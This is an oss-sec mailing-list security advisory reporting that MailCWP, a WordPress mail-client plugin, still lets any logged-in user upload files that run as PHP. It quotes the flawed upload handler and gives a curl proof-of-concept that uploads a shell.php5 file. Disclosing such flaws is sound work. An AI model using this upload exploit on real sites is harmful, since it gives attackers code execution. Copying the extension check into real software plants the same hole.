oss-sec mailing list archives
Mailcwp remote file upload vulnerability incomplete fix v1.100
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 08 Nov 2016 05:40:55 -0500
Title: Mailcwp remote file upload vulnerability incomplete fix v1.100 Author: Larry W. Cashdollar, @_larry0 Date: 2016-11-01 Download Site: https://wordpress.org/plugins/mailcwp/ Vendor: CadreWorks Pty Ltd Vendor Notified: 2016-11-01 Vendor Contact: plugins () wordpress org Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website. Vulnerability: I noticed CVE-2015-1000000 wasn't fixed correctly, _any_ authenticated user can upload a file to the WordPress installation, they can get .php code execution by changing the extension to .php[3-5], .pht or .phtml. My previous advisory: http://www.vapidlabs.com/advisory.php?v=138 require_once "../../../wp-load.php"; if (!is_user_logged_in()) { die('{"ERROR": -1}'); } $message_id = $_REQUEST["message_id"]; $upload_dir = $_REQUEST["upload_dir"]; if (empty($_FILES) || $_FILES["file"]["error"]) { die('{"OK": 0}'); } $fileName = $_FILES["file"]["name"]; $ext = pathinfo($fileName, PATHINFO_EXTENSION); if ($ext == 'php') { die('{"ERROR": -2}'); } move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName"); die('{"OK": 1}'); CVE-2016-1000156 Exploit Code: • Create any type of user and copy the contents of your cookie file for curl: • • $ curl -F "file=@/home/larry/shell.php5" "http://example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1" -F "upload_dir=/usr/share/wordpress/wp-content/uploads" --cookie cookie.txt • {"OK": 1} Advisory: www.vapidlabs.com/advisory.php?v=175 Notes: Incomplete fix for CVE-2015-1000000
Current thread:
- Mailcwp remote file upload vulnerability incomplete fix v1.100 Larry W. Cashdollar (Nov 08)